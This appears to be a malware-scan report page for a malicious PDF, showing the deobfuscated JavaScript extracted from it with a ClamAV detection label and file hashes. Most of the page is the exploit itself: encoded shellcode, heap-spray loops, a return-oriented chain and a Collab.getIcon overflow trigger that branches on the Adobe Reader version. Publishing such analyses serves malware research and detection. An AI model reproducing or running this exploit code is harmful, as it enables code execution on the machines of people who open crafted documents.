u0467%u9b0c%u8f9d%u068f%u6bca%u0c04%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e" +
"%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d%u064f%ud065%ud2d1%u4dd4%u8f87");
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH("%u0C0C%u0C0C");
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<496;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else if(app.viewerVersion>=9.00)
{
exp();
}
else
{
exp8();
}
|
|||
js_property_alias_stage_000.js |
deobfuscated-js | JavaScript property alias normalized stage at offset 0x2D216 | 10025 bytes |
SHA-256: 80243d0f780cc38bd4c31aec2d93374c330b47b98e126bc96ad4e3fd6e13b0c5 |
|||
|
Detection
ClamAV:
Js.Exploit.Shellcode-18
Obfuscation or payload:
likely
Carved artifact contains 1 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var sc;//ahlfah
for(i=0;i<18000;i++)
sc = sc+0x70;
var h1="byteToChar";
var unun=unescape;
function rep(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
function myunes(buf) {
var ret='';
for (var x=0;x < buf["length"]; x+=2) {
ret =ret+util[h1](Number('0x'+buf["substr"](x,2)));//
}
return ret;
}
sc=unun("%u0C0c%u9090%u9090%u11eb%u5bfc%u334b%u66c9%u2eb9%u8003" +
"%u0b34%ue28f%uebfa%ue805%uffeb%uffff%ubf67%u8f8f" +
"%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18" +
"%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05" +
"%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36" +
"%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5" +
"%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5" +
"%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f" +
"%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804" +
"%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764" +
"%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f" +
"%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63" +
"%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa" +
"%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9" +
"%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70" +
"%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68" +
"%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02" +
"%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa" +
"%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f" +
"%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04" +
"%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca" +
"%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d" +
"%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f" +
"%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070" +
"%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137" +
"%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b" +
"%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2" +
"%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d" +
"%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f" +
"%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07" +
"%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f" +
"%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f" +
"%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e" +
"%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b" +
"%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80" +
"%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66" +
"%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64" +
"%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70" +
"%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e" +
"%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70" +
"%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8" +
"%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f" +
"%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6" +
"%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848" +
"%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83" +
"%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f" +
"%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df" +
"%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb" +
"%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04" +
"%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240" +
"%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964" +
"%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d" +
"%u064f%ud065%ud2d1%u4dd4%u8f87");
function exp() {
//aslf['asgk'g;
blah = rep(128, unun("%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C%u0C0C")) + sc;
bbk = unun("%u0C0C%u0C0C");
wap = blah["length"]+36
while (bbk["length"]<wap) bbk+=bbk;
fillbk = bbk["substring"](0, wap);
bk = bbk["substring"](0, bbk["length"]-wap);
while(bk["length"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//hdofhajljf2[
for (i=0;i<400;i++) mm[i] = bk + blah;
}
function exp8() {
blah = rep(128, unun("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unun("%u4242%u4242");
var h="getIcon";
wap = 0x24+blah["length"]
while (bbk["length"]<wap) bbk+=bbk;
fillbk = bbk["substring"](0, wap);
bk = bbk["substring"](0, bbk["length"]-wap);
while(bk["length"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("0a0a0a0a"));
var a=["_N.bundle"];//next time
var b=5;//shlshgl
Collab.getIcon(of+a[b-b])//ajf[pa';[
}
if(app.viewerVersion>=9.40)
{
var LbWxSqgNmAwjUaoXaywhlH = unescape
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH("%u0C0C%u0C0C%u4919%u0700%u0C0C%u0C0C%u12bb%u0700%u0C0C%u0C0C" +
"%u0C0C%u0C0C%u1599%u0700%u0124%u0001%u72f7%u0700" +
"%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700" +
"%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700" +
"%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001" +
"%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700" +
"%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000" +
"%u0104%u0001%u1000%u0000%u0040%u0000"+
"%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722"+
"%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700"+
"%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb"+
"%u0700%u0C0C%u0C0C%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700"+
"%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090"+
"%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff"+
"%u154d%u0700%ud731%u0700%u112f%u0700"+
"%u3030%u3030%u0C0c%u11eb%u5bfc%u334b%u66c9%u2eb9%u8003" +
"%u0b34%ue28f%uebfa%ue805%uffeb%uffff%ubf67%u8f8f" +
"%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18" +
"%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05" +
"%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36" +
"%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5" +
"%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5" +
"%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f" +
"%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804" +
"%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764" +
"%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f" +
"%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63" +
"%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa" +
"%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9" +
"%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70" +
"%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68" +
"%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02" +
"%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa" +
"%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f" +
"%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04" +
"%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca" +
"%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d" +
"%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f" +
"%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070" +
"%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137" +
"%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b" +
"%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2" +
"%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d" +
"%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f" +
"%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07" +
"%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f" +
"%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f" +
"%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e" +
"%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b" +
"%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80" +
"%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66" +
"%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64" +
"%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70" +
"%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e" +
"%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70" +
"%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8" +
"%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f" +
"%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6" +
"%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848" +
"%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83" +
"%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f" +
"%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df" +
"%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb" +
"%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04" +
"%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240" +
"%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964" +
"%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d" +
"%u064f%ud065%ud2d1%u4dd4%u8f87");
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH("%"+ "u" + "0" + "C" + "0" + "C" + "%u" + "0" + "C" + "0" + "C");
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["length"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["substring"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["substring"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["length"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["substring"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<496;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else if(app.viewerVersion>=9.00)
{
exp();
}
else
{
exp8();
}
/* static-property-alias-sinks */
unescape('%u9090%u9090');Collab.getIcon(
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.